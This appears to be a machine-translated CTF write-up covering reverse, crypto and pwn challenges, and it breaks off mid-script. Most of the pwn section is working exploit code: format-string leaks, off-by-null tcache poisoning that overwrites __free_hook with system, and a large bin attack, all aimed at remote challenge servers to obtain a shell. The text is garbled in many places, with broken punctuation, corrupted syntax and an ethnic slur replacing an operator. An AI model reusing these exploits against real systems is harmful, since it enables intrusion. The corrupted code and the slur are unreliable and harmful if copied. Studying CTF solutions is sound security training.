a2 = [0xA5.0xCF.0xCD.0xD6.0xC5.0xC3.0xB1.0xC5.0xD2.0xD9.0xD7.0xC7.0xD6.0xCD.0xD4.0xD8.0xC3.0xBB.0xCD.0xD8.0xCC.0xC3.0xB0.0xC5.0xD8.0xC9.0xDC.0.0.0.0.0]
for i in range(32):
c = 0
for j in range(i+1):
c ^= a2[j]
a.append(c)
orders = [0.5.5.2.2.3.4.4.3.2.0.3.0.3.2.1.5.1.3.1.5.5.2.4.0.0.4.5.4.4.5.5] [: : -1]
print '-- -- -- -- -- -- -- -- -- --'
for i in range(32) :print a,', '
if orders[i] == 0:
fun1(a, b)
elif orders[i] == 1:
fun2(a, b)
elif orders[i] == 2:
fun3(a, b)
elif orders[i] == 3:
fun4(a, b)
elif orders[i] == 4:
fun5(a, b)
elif orders[i] == 5:
fun6(a, b)
print '-- -- -- -- -- -- -- -- -- --'
print (b)
def get_aas2(orders) :
b = [ord(c) for c in 'flag{12345678901234567890123456}']
a = []
a3 = '9d5f741799d7e62274f01963516316d2eb6888b737bab0a2b0e1774e3b7389e5'.decode('hex')
a2 = [0xA5.0xCF.0xCD.0xD6.0xC5.0xC3.0xB1.0xC5.0xD2.0xD9.0xD7.0xC7.0xD6.0xCD.0xD4.0xD8.0xC3.0xBB.0xCD.0xD8.0xCC.0xC3.0xB0.0xC5.0xD8.0xC9.0xDC]
a4 = []
for i in range(32):
a4.append(ord(a3[i])^a2[i%len(a2)])
for i in range(32):
c = 0
for j in range(i+1):
c ^= a4[j]
a.append(c)
aas = []
for i in range(32):
aas.append(a[:])
if orders[i] == 0:
fun1(a, b)
elif orders[i] == 1:
fun2(a, b)
elif orders[i] == 2:
fun3(a, b)
elif orders[i] == 3:
fun4(a, b)
elif orders[i] == 4:
fun5(a, b)
elif orders[i] == 5:
fun6(a, b)
return aas
def get_aas(orders) :
b = [ord(c) for c in 'flag{12345678901234567890123456}']
a = []
a2 = [0xA5.0xCF.0xCD.0xD6.0xC5.0xC3.0xB1.0xC5.0xD2.0xD9.0xD7.0xC7.0xD6.0xCD.0xD4.0xD8.0xC3.0xBB.0xCD.0xD8.0xCC.0xC3.0xB0.0xC5.0xD8.0xC9.0xDC.0.0.0.0.0]
for i in range(32):
c = 0
for j in range(i+1):
c ^= a2[j]
a.append(c)
aas = []
for i in range(32):
aas.append(a[:])
if orders[i] == 0:
fun1(a, b)
elif orders[i] == 1:
fun2(a, b)
elif orders[i] == 2:
fun3(a, b)
elif orders[i] == 3:
fun4(a, b)
elif orders[i] == 4:
fun5(a, b)
elif orders[i] == 5:
fun6(a, b)
return aas
def dec(aas, orders, seed) :
#b = [101, 46, 7, 63, 148, 47, 164, 57, 127, 160, 41, 36, 28, 175, 229, 120, 228, 102, 147, 78, 254, 68, 207, 240, 223, 246, 251, 73, 235, 24, 215, 30]
#b = [132, 13, 239, 89, 97, 68, 214, 77, 139, 199, 61, 244, 220, 107, 175, 6, 222, 75, 100, 91, 167, 143, 135, 74, 72, 246, 81, 54, 83, 64, 165, 216]
bs = l64(0x2F34A83A1B38C557) + l64(0xEE8F2F04E4C69739) + l64(0x486FC9246780515E) + l64(0xEBC2C2B0C7BD7F5B)
b = [ord(i) for i in bs]
re_orders = orders[::-1]
for i in range(32):
a = aas[31-i]
if re_orders[i] == 0:
fun1(a, b)
elif re_orders[i] == 1:
fun2(a, b)
elif re_orders[i] == 2:
fun3(a, b)
elif re_orders[i] == 3:
fun4(a, b)
elif re_orders[i] == 4:
fun5(a, b)
elif re_orders[i] == 5:
defun6(a, b)
#print b
s = ' '.join(chr(i) for i in b)
is_printable = True
for i in range(10) :if b[i] > 0x80:
is_printable = False
break
if is_printable:
print seed, s
return is_printable
def srand(s) :
global seed
seed = s
# microsoft c runtime implementation
def rand() :
global seed
seed = (seed * 214013 + 2531011) % 2支那64
return (seed >> 16) &0x7fff
def gen_order(seed=1) :
srand(seed)
orders = []
for i in range(32):
orders.append(rand() % 6)
return orders
orders = gen_order(seed=1)
aas = get_aas(orders)
dec(aas, orders, 1)
Copy the codeflag{Kmode_Umode_Communication! }
2, blackmail decryption
The main logic of the analysis program is to first calculate the fixed secret key + timestamp combined with the generated key for SHA256, and then use this as the key to generate. BMP file content for AES encryption, encryption IV is 0
The code is as follows:
#coding:utf-8
import base64
from hashlib import *
from Crypto.Cipher import AES
def decrypt(data, key):
cryptos = AES.new(key, AES.MODE_ECB)
decrpytBytes = list(base64.b64decode(data))
decrpytBytes = bytes(decrpytBytes)
data = cryptos.decrypt(decrpytBytes)
return data
key = "f4b6bb19108b56fc60a61fc967c0afbe71d2d9048ac0ffe931c901e75689eb46"[:32]
key = bytes.fromhex(key)
f1 = open("flag.bmp.ctf_crypter", "rb")
f2 = open("flag.bmp", "wb")
data = f1.read()
def xor(enc, data):
res = []
for i in range(len(a)):
res += [enc[i]^data[i]]
return bytes(res)
for i in range(len(data)//16):
enc = base64.b64encode(data[16*i:16*(i+1)])
if i > 0:
ans = xor(decrypt(enc, key), data[16*(i-1):16*i])
else:
ans = decrypt(enc, key)
fp2.write(ans)
f1.close()
f2.close()
Copy the codeDecrypted flag is as follows:
3, LightningSystem
Generate the bin file from HEX. Open the bin file with IDA and select the ARM architecture. The analyzer found that 512 bytes of data had been read from the SPI interface. Sal can see 4 waveforms, where chall 2 is the input, and extract 512 bytes of data from the waveforms. Continue to analyze the lightningSystem.bin code, you can see that it is a VM, write a script to get vmCode function. Continue to analyze the code of VMCode to obtain the algorithm, and finally solve exp as follows:
To solve the
def brute(v4, v5, a, b, j):
should_out = [0x12, 0x67, 0x0F, 0xDB, 0xF6, 0x0A, 0x0F, 0x39, 0xF6, 0xC9, 0xF5, 0xC1, 0xF2, 0xA3, 0x0D, 0xD0, 0xF5, 0x01, 0x0C, 0x6F, 0x0E, 0x39, 0xF2, 0x80, 0xF5, 0xE4, 0x0C, 0xD7, 0xF8, 0x68, 0x0C, 0x96, 0xF5, 0xA5, 0x0F, 0x9F, 0x0F, 0x31, 0xF9, 0x2E, 0x1B, 0x07]
v13 = a
v14 = b
v15 = 7 * (j ^ 0x4D)
v16 = (v5 + 7 * (j ^ 0x4D)) & 0xff
v18 = v13 - 0x20 + v16
v19 = (v14 - 0x20) << 7
o1 = ((v4 + ((v19 + v18) >> 8) + ((v15 + v5) >> 8)) & 0xff)
o2 = ((v18 + v19) & 0xff)
if (o1 == should_out[2*j]) & (o2 == should_out[2*j+1]):
print a, b
return True
return False
v4 = 234
v5 = 6
s = ''
for k in range(21):
find = False
for a in range(0x20, 0x80):
for b in range(0x20, 0x80):
if brute(v4, v5, a, b, k):
s += chr(a)+chr(b)
find = True
break
if find:
break
if not find:
print ('fail')
print s
Copy the codeFlag {31fd5C30-dc82-abd0-741B-9ba425f2e692}
4, Rev_Dizzy
Look at the decompiled code, and then add or subtract xor from the compared data
The code is too big, so I won’t post it, in the attached document (named deal.cpp)
Run the following flag:
crypto
1, Guess
The second level is related to matrix operation. The matrix of key is given to the data in the first column [119,201,718,647]. With this row of data and the result of matrix multiplication, The intermediate random matrix can be computed by using the sage function key.solve_left().
But the constraint of this function is not well tuned, and now we can only solve a useless particular solution.
First find key, which is a matrix of 204, and multiply it by a matrix of 412 to get the matrix in hint. So A times R is equal to B, and we know B and we want to solve for A. Ctf.njupt.edu.cn/546.html#di…
msg = open(r'C:\\Users\\wcj\\Desktop\\guess_c31fa29ffba2ff77b12dec354b8909e6\\hint', 'r').readlines()
B = []
for var in msg:
var = var[1:-2].split(' ')
for x in var:
B.append(int(x))
BB = []
for i in range(0, len(B), 20):
BB.append(B[i: i + 20])
As = []
for i in range(1000):
shuffle(BB)
for line in matrix(len(BB), 20, BB).LLL(delta=float(randint(30000, 99999)/100000)):
if line[0] < 0:
line = -line
if line not in As and all(map(lambda x: 100 <= x <= 1000, line)):
print(len(BB), line)
As.append(line)
a = [241, 232, 548, 400, 186, 333, 646, 727, 286, 877, 810, 121, 237, 745, 201, 542, 244, 396, 158, 641]
b = [119, 521, 142, 637, 614, 746, 299, 416, 638, 288, 995, 498, 639, 585, 114, 885, 558, 783, 899, 751]
c = [718, 550, 349, 939, 148, 355, 942, 685, 313, 577, 184, 130, 307, 983, 611, 903, 271, 530, 566, 427]
d = [647, 918, 613, 936, 461, 281, 977, 888, 128, 653, 309, 780, 526, 216, 944, 123, 430, 860, 113, 129]
m = matrix([b, a, c, d])
K = []
for i in range(20):
for j in range(4):
K.append(m[j][i])
print(K)
print(len(K)==80)
Copy the codeThe encryption algorithm used in the title is Paillier, which has the property of multiplicative homomorphism, that is, D(c1C2)=m1+m2, so D(c^k)=km. The third step passes two plaintext to the server, which returns one ciphertext. In step 4, the square of the ciphertext is sent back to the server. The server returns twice the plaintext, so that the key used can be calculated and the ciphertext returned in step 3 can be determined
import socket from pwn import * from pwnlib.util.iters import mbruteforce from hashlib import sha256 K = [119, 241, 718, 647, 521, 232, 550, 918, 142, 548, 349, 613, 637, 400, 939, 936, 614, 186, 148, 461, 746, 333, 355, 281, 299, 646, 942, 977, 416, 727, 685, 888, 638, 286, 313, 128, 288, 877, 577, 653, 995, 810, 184, 309, 498, 121, 130, 780, 639, 237, 307, 526, 585, 745, 983, 216, 114, 201, 611, 944, 885, 542, 903, 123, 558, 244, 271, 430, 783, 396, 530, 860, 899, 158, 566, 113, 751, 641, 427, 129] def main(): Sk = socket.socket(socket.af_inet, socket.sock_stream) sk.connect(('47.104.85.225', 57811)) msg = sk.recv(1024).decode() suffix = msg[10:msg.find(')')] cipher = msg[msg.find('==') + 3:-1] proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() == cipher, string.ascii_letters + string.digits, length=4, method='fixed') sk.send((proof + '\n').encode()) for _ in range(32): msg = sk.recv(1024).decode() while True: if msg.find('Please give me one decimal ciphertext.') ! = -1: break msg += sk.recv(1024).decode() n = int(msg[msg.find('n = ') + 4: msg.find('g = ') - 1]) sk.send('1\n'.encode()) msg = sk.recv(1024).decode() msg = sk.recv(1024).decode() sk.send('4\n'.encode()) msg = sk.recv(1024).decode() sk.send('5\n'.encode()) msg = sk.recv(1024).decode() msg = sk.recv(1024).decode() cipher_text = int(msg[:msg.find('Step') - 1]) cipher_text = (cipher_text ** 2) % (n ** 2) sk.send((str(cipher_text) + '\n').encode()) msg = sk.recv(1024).decode() msg = sk.recv(1024).decode() plaint = int(msg[:msg.find('Step') - 1]) m = plaint // 40 index = K.index(m) if index % 2 == 0: sk.send('0\n'.encode()) else: sk.send('1\n'.encode()) msg = sk.recv(20).decode() if(msg == 'sorry'): exit(1) flag = sk.recv(1024).decode() print(flag) if __name__ == '__main__': main()Copy the codeflag{e87fdfb6-8007-4e1c-861f-5bde3c8badb3}
2, myRSA
Derived from encryption function
def encry(message,key,p,q,e) :
k1,k2 = key[random.randint(0.127)],key[random.randint(0.127)]
x = p**2 * (p + 3*q - 1 ) + q**2 * (q + 3*p - 1)
y = 2*p*q + p + q
z = k1 + k2
c = pow(b2l(message),e,p*q)
return x * c + y * c + z
Copy the coden == p*q
encry == x*c+y*c+z
== c*(x+y)+z
== c*(p^2*(p+3*q-1)+q^2*(q+3*p-1)+2*p*q+p+q)+z
== c*(p^3+3*q*p^2-p^2+q^3+3*q*p^2-q^2+2*p*q+p+q)+z
== c*( (p^3+3*q*p^2+3*q*p^2+q^3) - (p^2-2*p*q+q^2) + (p+q) )+z
== c*( (p+q)^3 - (p^2+2*p*q+q^2) + (p+q) - 4*p*q)+z
== c*( (p+q)^3 - (p+q)^2 + (p+q) - 4*n)+z
Copy the codeWhen message is known, i.e. C is known, then:
((p + q) ^ 3 - (p + q) ^ 2 + 4 * (p + q) - n) + z = = encry / / / c/c bit_length (z) material bit_length (c) (p + q) ^ 3 - (p + q) ^ 2 + (p + q) material Encry //c + 4*n p+q ≈ iroot(encry//c + 4*n,3)Copy the codeWhen you get p plus q, you can factor it into p and q, and then
Encry (falg) = = c * (p + q) ^ (3 - (p + q) ^ 2 + 4 * (p + q) - p + q) + z encry (falg) / / ((p + q) ^ 3 - (p + q) ^ 2 + 4 * (p + q) - p + q) material c c material encry(falg)//( (p+q)^3 - (p+q)^2 + (p+q) - 4*p+q ) pow(flag,e,p*q) == c flag = pow(c,d,p*q)Copy the codeThe interaction process is shown as follows:
The specific code is as follows:
from gmpy2 import *
from libnum import *
import hashlib, string
import string
string.ascii_letters+string.digits
def getHash(salt, result) :
characters = string.ascii_letters+string.digits
for c1 in characters:
for c2 in characters:
for c3 in characters:
for c4 in characters:
proof = (c1 + c2 + c3 + c4)
if hashlib.sha256((proof + salt).encode()).hexdigest() == result:
return proof
# print(getHash('22DTYHroGWCn', 'e4c9ef8db51891583283e46918102679b1a6c3dfe39fc03b6358dfc25a774b87'))
n = 853431495781760606735256810267239303593142807682423856090248158285567129078742388863006675431037659885861686036310561108 283613095918756605849419414811310929741851467508449151505667007010925637583722528366397628792378275993382688095691176544 36310368636789827651104134868900261762104527595991833761714901016029
e = 65537
m1s = b'123456'
cc1 = 105373287756342103942318018207056724895113233474538384206517559444291374325564458162829935057543845664205750932828630502 829241312854079542426015944635674945007233226969286492255522761944177693783964402040849515814480732059253751703782424818 957331522695828579625990399140552544980352436208260945967283728637409348330898050232258063842734314870654886700796338003 597546732410884458751238829865847139778432136828226800897288424010979417923480250780864971811755934542620713460207847994 035065574879421110368856772784757449082198034834405011617207370781985693178239051493374933415204965262530381690146459520 225010213093464909483816574798355968626256136465430160720859598955776299806476466769412478819481700794165326427988495181 589303730517671784092779839924300337807278823503948
flagcc = 454290573758015984361161126262811922788755078401937487579079634614218474633801258967721156564975754624859004052141021296 088980113896281079737825700103991596426503507575094089473968746944563893361448273886607332373914110733362866368001364669 002738540783848149392686860094417167606048872651224504789189640531484807929947408609762054624949645581390736093100707064 204367843770956253500452956970787266407106360175299552284981057764308021200628000230080295901166574595815192713921576623 749344127096235109866174624137703038268714280160476563698761263045817706939008171964455359487525305018326387123255659560 601103557128168884398217553297448525018481589736937600226945431670247899467168039685000720178976703743528438795723822518 269229648079592317649607172977245430485797171405656
m1 = s2n(m1s)
c1 = powmod(m1,e,n)
x = iroot(cc1//c1+4*n,3) [0]
while True:
t = iroot(x*x-4*n,2)
if t[1]:
p = (x+t[0/ /])2
q = (x-t[0/ /])2
if p*q == n:
print(p,q)
break
x = x-1
d = invert(e,(p-1)*(q-1))
x = p**2 * (p + 3*q - 1 ) + q**2 * (q + 3*p - 1)
y = 2*p*q + p + q
t = x+y
flagc = flagcc//t+100
while True:
flag = powmod(flagc,d,n)
f = n2s(int(flag))
if b'ctf' in f or b'flag' in f or b'CTF' in f or b'FLAG' in f:
print(f)
break
flagc = flagc - 1
Copy the code3, Random_RSA
The python seed generates the same sequence of random numbers. First xor decrypts dp with the generated sequence of random numbers, and then
Blog.csdn.net/weixin_4536…
# -*- coding: utf-8 -*-
from Crypto.Util.number import *
import gmpy2
import libnum
import random
import binascii
import os
n=811962829926061135912336152046805976452085622793278540269813769179778436448551805282270377526924985583700263532449814679 000571579974627607320193721859558465079774566577601256821251043092418021088536184684914633262680164501198171813687433769 19334016359137566652069490881871670703767378496685419790016705210391
c=615052562239933495344745508777876755008273328789416212614778608806897999609382020206143422085188695820193078507894937015 893094535660958812941663366734879092218606418096225248139592847222850697553108909722555454369890826547050989070066947809 49725756312169019688455553997031840488852954588581160550377081811151
e = 65537
#rands=[[58, 53, 122],[145, 124, 244],[5, 19, 192],[255, 23, 64],[57, 113, 194],[246, 205, 162],[112, 87, 95],[215, 147, 105], [16, 131, 38], [234, 36, 46], [68, 61, 146], [148, 61, 9], [139, 77, 32], [56, 96, 160], [121, 76, 17], [114, 246, 92], [178, 206, 60], [168, 147, 26], [168, 41, 68], [24, 93, 84], [43, 175, 88], [147, 97, 153], [42, 94, 45], [150, 103, 127], [68, 163, 62], [165, 37, 89], [219, 248, 59], [241, 182, 8], [140, 211, 146], [88, 226, 2], [48, 150, 56], [87, 109, 255], [227, 216, 65], [23, 190, 10], [5, 25, 64], [6, 12, 124], [53, 113, 124], [255, 192, 158], [61, 239, 5], [62, 108, 44, 86], [123, 64], [195, 192, 30], [30, 82, 95], [56, 178, 165], [68, 77, 239], [106, 247, 226], [17, 46, 114], [91, 71, 43, 156], [157, 182], [6, 146, 42], [148, 143, 161], [108, 33, 139], [139, 169, 157], [71, 140, 25], [28, 153, 26], [241, 221, 235], [28, 131, 141], [159, 111, 184], [47, 206, 11], [220, 152, 157], [41, 213, 97], [4, 220, 10], [13, 77, 248], [94, 140, 110], [25, 250, 226], [218, 102, 109], [189, 238, 66], [18, 91, 131], [23, 239, 190], [159, 33, 72], [183, 78, 208], [209, 213, 101], [111, 50, 220], [166, 104, 233], [170, 144, 10], [187, 87, 175], [195, 59, 104], [165, 179, 179], [99, 247, 153], [195, 61, 100], [223, 159, 165], [230, 93, 184], [87, 28, 35], [35, 122, 38], [158, 188, 163], [229, 192, 222], [12, 12, 192], [207, 95, 224], [127, 113, 137], [22, 114, 143], [13, 45, 144], [70, 140, 211], [57, 101, 42], [132, 62, 129], [40, 128, 124], [1, 132, 161], [164, 33, 133], [252, 201, 32], [8, 18, 247], [1, 88, 55], [201, 135, 186], [101, 254, 125], [236, 196, 39], [148, 24, 103], [101, 29, 253], [97, 156, 64], [90, 103, 91], [50, 48, 80], [206, 22, 93], [11, 114, 174], [61, 132, 247], [215, 32, 232], [95, 128, 90], [57, 35, 228], [163, 143, 107], [178, 250, 28], [64, 107, 225], [106, 115, 207], [85, 134, 21], [118, 201, 76], [234, 34, 22], [241, 236, 122], [111, 185, 127], [1, 26, 164], [254, 57, 117], [243, 27, 32], [161, 88, 80], [50, 165, 93], [87, 182, 216], [184, 159, 63], [167, 166, 123], [37, 78, 33], [186, 81, 58], [3, 48, 239], [70, 186, 13], [56, 108, 178], [54, 55, 235], [105, 180, 105], [16, 194, 98], [136, 11, 41], [18, 203, 79], [185, 114, 170], [148, 181, 223], [118, 57, 160], [23, 250, 181], [235, 219, 228], [44, 151, 38], [185, 224, 134], [42, 162, 122], [3, 9, 158], [129, 245, 2], [66, 241, 92], [80, 124, 36]]
res=[55.5.183.192.103.32.211.116.102.120.118.54.120.145.185.254.77.144.70.54.193.73.64.0.79.244.190.23.215.187.53.176.27.138.42.89.158.254.159.133.78.11.155.163.145.248.14.179.23.226.220.201.5.71.241.195.75.191.237.108.141.141.185.76.7.113.191.48.135.139.100.83.212.242.21.143.255.164.146.119.173.255.140.193.173.2.224.205.68.10.77.180.24.23.196.205.108.28.243.80.140.4.98.76.217.70.208.202.78.177.124.10.168.165.223.105.157.152.48.152.51.133.190.202.136.204.44.33.58.4.196.219.71.150.68.162.175.218.173.19.201.100.100.85.201.24.59.186.46.130.147.219.22.81]
# res = [48, 187, 242, 82, 159, 17, 153, 125, 154, 127, 74, 37, 162, 190, 27, 236, 201, 0, 209, 87, 74, 247, 218, 92, 206, 134, 60, 120, 132, 2, 221, 60, 98, 96, 120, 249, 18, 117, 107, 156, 207, 94, 141, 208, 78, 61, 192, 34, 121, 96, 212, 207, 82, 71, 7, 191, 207, 232, 38, 227, 98, 222, 222, 234, 84, 9, 180, 33, 22, 113, 154, 170, 231, 64, 44, 214, 164, 130, 197, 167, 70, 11, 241, 52, 145, 82, 42, 8, 214, 69, 98, 102, 122, 79, 91, 180, 146, 117, 29, 124, 21, 83, 125, 123, 251, 209, 191, 121, 212, 202, 244, 77, 136, 80, 224, 153, 181, 209, 50, 173, 62, 61, 5, 164, 209, 120, 75, 138, 47, 76, 196, 117, 199, 242, 211, 157, 85, 103, 243, 96, 16, 145, 157, 68, 25, 105, 109, 136, 11, 228, 36, 79, 115, 250]
seeds=[4827.9522.552.880.7467.7742.9425.4803.6146.4366.1126.4707.1138.2367.1081.5577.4592.5897.4565.2012.2700.1331.9638.7741.50.824.8321.7411.6145.1271.7637.5481.8474.2085.2421.590.7733.9427.3278.5361.1284.2280.7001.8573.5494.7431.2765.827.102.1419.6528.735.5653.109.4158.5877.5975.1527.3027.9776.5263.5211.1293.5976.7759.3268.1893.6546.4684.419.8334.7621.1649.6840.2975.8605.5714.2709.1109.358.2858.6868.2442.8431.8316.5446.9356.2817.2941.3177.7388.4149.4634.4316.5377.4327.1774.6613.5728.1751.8478.3132.4680.3308.9769.8341.1627.3501.1046.2609.7190.5706.3627.8867.2458.607.642.5436.6355.6326.1481.9887.205.5511.537.8576.6376.3619.6609.8473.2139.3889.1309.9878.2182.8572.9275.5235.6989.6592.4618.7883.5702.3999.925.2419.7838.3073.488.21.3280.9915.3672.579]
ress = ""
dp = ' '
for i in range(0.154):
random.seed(seeds[i])
rands = []
for j in range(0.4):
rands.append(random.randint(0.255))
# print(rands)
ress+=chr((res[i]) ^ rands[i % 4])
# dp += str((res[i]) ^ rands[i % 4])
print(ress)
# print(dp)
dp = 537200742616119615440564050411073665919018319405296672307604126661089315867809284545023250879327958516330491880765694614 7575280063208168816457346755227057
import gmpy2
for x in range(1, e):
if(e * dp % x == 1):
p = (e * dp - 1) // x + 1
if(n % p ! =0) :continue
q = n // p
fain = (p-1) * (q-1)
d = gmpy2.invert(e, fain)
m = pow(c, d, n)
if(len(hex(m)[2:]) % 2= =1) :continue
print("m:", m)
print("flag:", binascii.a2b_hex(hex(m)[2:))Copy the codepwn
1, note
Scanf can be used to format the string, first modify the stdout pointer left on the station, can leak the address, then can write any address:
Finally, using the traditional exit_hook, hijack _dl_rtld_lock_recursive to one_gadget to get shell when exit is called
exp:
#! usr/bin/env python
#-*- coding:utf8 -*-
from pwn import *
import sys
pc="./note"
reomote_addr=["47.104.70.90".25315]
elf = ELF(pc)
libc = elf.libc
context.binary=pc
context.terminal=["gnome-terminal".'-x'.'sh'.'-c']
if len(sys.argv)==1:
# p=process(pc)
context.log_level="debug"
p=process(pc,env={"LD_PRELOAD":". / libc - 2.23. So"})
if len(sys.argv)==2 :
if 'l' in sys.argv[1]:
p=process(pc)
if 'r' in sys.argv[1]:
p = remote(reomote_addr[0],reomote_addr[1])
if 'n' not in sys.argv[1]:
context.log_level="debug"
ru = lambda x : p.recvuntil(x,timeout=0.2)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
shell= lambda :p.interactive()
ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8.'\x00'))
rv6 = lambda : u64(rv(6) +'\x00'*2)
def lg(s,addr) :
print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
what_choice="choice: "
ch_add="1"
ch_dele=""
ch_edit="2"
ch_show="3"
what_size="size: "
what_c="content: "
what_idx=""
def add(size,c='a') :
ru(what_choice)
sl(ch_add)
ru(what_size)
sl(str(size)) # 0x100
ru(what_c)
sn(c)
# ru(what_c)
def edit(c,hhh=' ') :
ru(what_choice)
sl(ch_edit)
ru("say ? ")
sn(c) ##0x64
ru("? ")
sl(hhh)
def show() :
ru(what_choice)
sl(ch_show)
ru("content:")
add(0x20)
bp(0x1235.'\nc')
edit('%7$s'.ljust(8.'\x00'),p64(0xfbad1800) +'\x00'*3*8+'\n')
libc_base = ru7f() - 0x3c36e0
lg("libc_base",libc_base)
rtld_lock = libc_base + 0x5f0f48
one_addr=libc_base+0xf1247
edit('%7$s'.ljust(8.'\x00')+p64(rtld_lock),p64(one_addr))
ru(what_choice)
sl('0')
shell()
Copy the codeflag{006c45fa-81d5-45eb-8f8c-eb6833daadf5}
2, lemon
The beginning of the pseudo-random number can be bypassed so that the flag is entered on the stack.
The program left a stack address on the BSS segment:
None of the menu functions check for negative subscripts, so you can modify the stack space by partially overwriting a pointer to the environment variable to flag’s address, and then breaking the heap structure to reveal flag in an error
exp:
# -*- coding:utf8 -*-
from pwn import *
pc = "./lemon_pwn"
libc = ELF('/ libc - 2.26. So')
context.binary = pc
context.terminal = ["gnome-terminal".'-x'.'sh'.'-c']
context.log_level= 'debug'
remote_addr = ["47.104.70.90".34524]
ru = lambda x : p.recvuntil(x,timeout=0.2)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
shell= lambda :p.interactive()
ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8.'\x00'))
rv6 = lambda : u64(rv(6) +'\x00'*2)
menu = lambda x:p.sendlineafter("> > >".str(x))
def lg(s, addr) :
print('\033[1;31;40m%20s-->0x%x\033[0m' % (s, addr))
def bp(bkp=0, other=' ') :
if bkp == 0:
cmd = ' '
elif bkp <= 0x7fff:
cmd = "b *$rebase("+str(bkp)+")"
else:
cmd = "b *"+str(bkp)
cmd += other
attach(p, cmd)
def add(index, name, size, content) :
menu(1)
ru("index of your lemon")
sl(str(index))
ru("name your lemon:")
sn(name)
ru("of message for you lemon:")
sl(str(size))
ru("Leave your message:")
sn(content)
def add2(index, name,size) :
menu(1)
ru("index of your lemon")
sl(str(index))
ru("name your lemon:")
sn(name)
ru("of message for you lemon:")
sl(str(size))
def show(index) :
menu(2)
ru(" your lemon :")
sl(str(index))
def dele(index) :
menu(3)
ru(" your lemon :")
sl(str(index))
def edit(index, content) :
menu(4)
ru(" index of your lemon")
sl(str(index))
ru("Now it's your time to draw and color!")
sn(content)
def exploit() :
sl("yes")
sa("Give me your lucky number:",p64(0xcff48db8b7c913e7))
sa("tell me you name first:",p64(0) *2+'\x00\x20\x00\x00\x01')
ru("0x")
flag = int(rv(3),16)
success(hex(flag))
flag2 = flag+0x1000-0x40 # flag Last byte of the address
success(hex(flag2))
payload = 'a'*0x138+chr(flag2&0xff) +chr((flag2>>8) &0xff) ## Overrides the location of the environment variable
success(payload.encode('hex'))
edit(-260,payload)
add(0.'desh'.0x20.'a')
dele(0)
add(0.'desh'.0x10.'a')
add2(1.'desh'.0x114514)
dele(0)
payload = p64(0x20)+p64(0x450)+p64(0x100000018)+p64(0x0)
add(0.'desh'.0x20,payload)
dele(0)
dele(1)
add(0.'\xa0'.0x20.'\xa0')
add2(1,p64(0x10),0x20)
while True:
try:
p = remote("47.104.70.90".34524)
exploit()
aaa = ru("or corruption (! prev):")
print aaa
if "flag" in aaa:
pause()
except:
p.close()
continue
Copy the codeflag{f578948e-8b48-494d-a11e-a97b7fbf14ee}
3, PassWordBox_FreeVersion
Fgets can overflow a \x00;
Off by NULL under libc2.27 to realize chunk overlap, then modify the FD pointer of tcache, allocate it to __free_hook, and modify it to system
#! usr/bin/env python
#-*- coding:utf8 -*-
from pwn import *
import sys
pc="./pwdFree"
reomote_addr=["47.104.71.220".38562]
elf = ELF(pc)
libc = elf.libc
context.binary=pc
context.terminal=["gnome-terminal".'-x'.'sh'.'-c']
if len(sys.argv)==1:
# p=process(pc)
context.log_level="debug"
p=process(pc,env={"LD_PRELOAD":"./libc.so.6"})
if len(sys.argv)==2 :
if 'l' in sys.argv[1]:
p=process(pc)
if 'r' in sys.argv[1]:
p = remote(reomote_addr[0],reomote_addr[1])
if 'n' not in sys.argv[1]:
context.log_level="debug"
ru = lambda x : p.recvuntil(x,timeout=0.2)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
shell= lambda :p.interactive()
ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8.'\x00'))
rv6 = lambda : u64(rv(6) +'\x00'*2)
def lg(s,addr) :
print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
what_choice="Input Your Choice:"
ch_add="1"
ch_dele="4"
ch_edit="2"
ch_show="3"
what_size="Length Of Your Pwd:"
what_c="Your Pwd:"
what_idx="Which PwdBox You Want Check:"
def add(ID,size,c=' ') : ##0x100
ru(what_choice)
sl(ch_add)
ru("Input The ID You Want Save:")
sl(ID)
ru(what_size)
sl(str(size))
ru(what_c)
sl(c)
def add2(ID,size,c=' ') : ##0x100
ru(what_choice)
sl(ch_add)
ru("Input The ID You Want Save:")
sl(ID)
ru(what_size)
sl(str(size))
ru(what_c)
sn(c)
def dele(idx) :
ru(what_choice)
sl(ch_dele)
ru("Idx you want 2 Delete:")
sl(str(idx))
def edit(idx,c) :
ru(what_choice)
sl(ch_edit)
sl(str(idx))
sn(c)
def show(idx) :
ru(what_choice)
sl(ch_show)
ru(what_idx)
sl(str(idx))
add(' '.0x20) # 0
ru("Save ID:")
rv(8)
key = u64(rv(8))
for i in range(7) :# 1-7
add('d'.0xf8)
add('d'.0x28) # 8
add('d'.0xf8) # 9
for i in range(2) :# 10-11
add('Desh'.0x48)
add('D'.0x28) # 12
add('D'.0xf8) # 13
add('D'.0x28) # 14
for i in range(7):
dele(i+1)
dele(12)
add2('d'.0x28.'a'*0x20+p64(0x1d0^key))
dele(9)
dele(13)
for i in range(8) :# 1-7, 9
add('d'.0xf8)
show(10)
ru("Pwd is: ")
libc_base = u64(rv(8))^key
libc_base -= 0x3ebca0
free_hook=libc_base+libc.sym['__free_hook']
sys_addr=libc_base+libc.sym['system']
lg("libc_base",libc_base)
lg("free_hook",free_hook)
add('d'.0x48) # 13
dele(10)
edit(13,p64(free_hook))
add('d'.0x40,p64(0x68732f6e69622f^key)) # 10
add('d'.0x40,p64(sys_addr^key))
dele(10)
lg("key",key)
shell()
Copy the codeflag{2db0e64f-afe1-44d4-9af9-ae138da7bb4b}
4, PassWordBox_ProVersion
UAF exists and can only apply for chunk of largebin size
Tcache_bins and tcache_max_bytes in mp_ structures can be modified with the large bin attack of 2.31
After calculation, write __free_hook on the position of the corresponding size of the forged tcache struct, which can be applied to change to system
exp:
#! /usr/bin/env python
